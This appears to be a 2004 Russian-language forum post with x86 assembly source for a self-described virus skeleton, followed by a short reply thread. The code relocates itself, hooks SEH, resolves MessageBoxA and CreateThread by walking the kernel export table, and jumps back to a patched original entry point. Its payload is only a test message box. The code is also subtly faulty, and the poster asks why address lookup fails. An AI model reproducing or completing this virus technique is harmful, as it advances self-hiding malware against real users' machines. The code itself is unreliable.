include                 consts.inc
p386
model   flat
locals  __

.data


	virstart:
		db      'Choors Test',0
		szTitle         db      "Choor test",0
		szMessage       db      "Get Api Addr",10

	virentry:
			sub     esp, virmemory
			pusha
			
			lea     ebp, [esp+32]

			call    __seh_init
			mov     esp, [esp+8]
			jmp     __seh_error
		
		__seh_init:             push    dword ptr fs:[0];
			mov     fs:[0], esp

			call    $+5
			pop     esi
			sub     esi, $-1-virstart

			mov     edi, ebp

			mov     ecx, virsize
			rep     movsb

			lea     eax, [ebp + in_new_addr-virstart]
			call    eax

		__seh_error:            pop     dword ptr fs:[0]
			pop     eax

			popa

			db      0E9h
			oldentry                dd      0

		jmp     loader

	; ---------------------------------------------------------------------------

	in_new_addr:

		call    get_func_names
		jc      __exit
		push    eax
		push    esp
		push    0
		push    ebp
		lea     eax, [ebp+newthread-virstart]
		push    eax
		push    0
		push    0
		call    x_CreateThread-virstart[ebp]
		pop     eax

	__exit:                 retn

	newthread:              pusha
		mov     ebp, [esp+32+4]

		call    __seh_init
		mov     esp, [esp+8]
		jmp     __seh_error
		__seh_init:
		mov     fs:[0], esp

		call    testmsgbox

	__seh_error:            pop     dword ptr fs:[0]
		pop     eax               ;

		popa
		retn

	get_func_names:

		lea     esi, imp_name-virstart[ebp]
		lea     edi, imp_addr-virstart[ebp]

	__cycle:                call    get_proc_address
		jz      __error
		stosd

		__scan0:                lodsb
		or      al, al
		jnz     __scan0

		cmp     [esi], al
		jne     __cycle

	__success:              clc
		retn

	__error:                stc
		retn

	get_proc_address:       
		
		pusha
		
		sub     esp, virmemory
		mov     ebx,[esp]
        and     ebx,0FFFF0000h

		mov     ecx, [ebx].mz_neptr
		mov     ecx, [ecx].pe_exporttablerva
		add     ecx, ebx

		xor     edi, edi
	__search_cycle:         lea     edx, [edi*4]
		add     edx, [ecx].ex_namepointersrva
		mov     edx, [edx]
		add     edx, ebx

		pusha
		mov     edi, edx
	__cmp_cycle:            cmp     byte ptr [edi], 0
		je      __cmp_done
		cmpsb
		je      __cmp_cycle
	__cmp_done:             popa

		je      __name_found

		inc     edi
		cmp     edi, [ecx].ex_numofnamepointers
		jb      __search_cycle

	__return_0:             xor     eax, eax        ; return 0
		jmp     __return

	__name_found:           mov     edx, [ecx].ex_ordinaltablerva
		add     edx, ebx
		movzx   edx, word ptr [edx*2]
		mov     eax, [ecx].ex_addresstablerva
		add     eax, ebx
		mov     eax, [eax*4]
		add     eax, ebx

	__return:               mov     [esp].popa_eax, eax
		test    eax, eax

		popa
		retn
		
testmsgbox:
        xor     eax,eax
        push    eax
        push    offset szTitle
        push    offset szMessage
        push    eax
        call    x_MessageBoxA-virstart[ebp]

imp_name:
	db      'MessageBoxA',0
	db      'CreateThread',0
	db      0

	align   4
	virsize                 equ     $-virstart

imp_addr:
	x_MessageBoxA          dd      ?
	x_CreateThread          dd      ?
	
	align   4
	virmemory               equ     $-virstart 
.code
	loader:
		call    virentry
	end     loader

• [asm] вирус, адрес апи - choor 27.06.04 22:34 [1015]
  • [asm] Есть много способов - amirul 29.06.04 11:53 [1437]
    • У меня почему-то при чтении кернела загруженного в... (-)  - choor 29.06.04 20:43 [1255]
      • В смысле "чтении кернела загруженного"? - amirul 30.06.04 11:16 [1267]
        • да с SEH я работал, вот токо у меня почему-то не находит... - choor 30.06.04 14:06 [1331]
          • Опять проблемы со стуком в подвале? - amirul 30.06.04 14:20 [1288]
            • SRC ASM CODE - choor 03.07.04 14:22 [1373]
              • Неужели нет решения? (-)  - choor 05.07.04 14:05 [1266]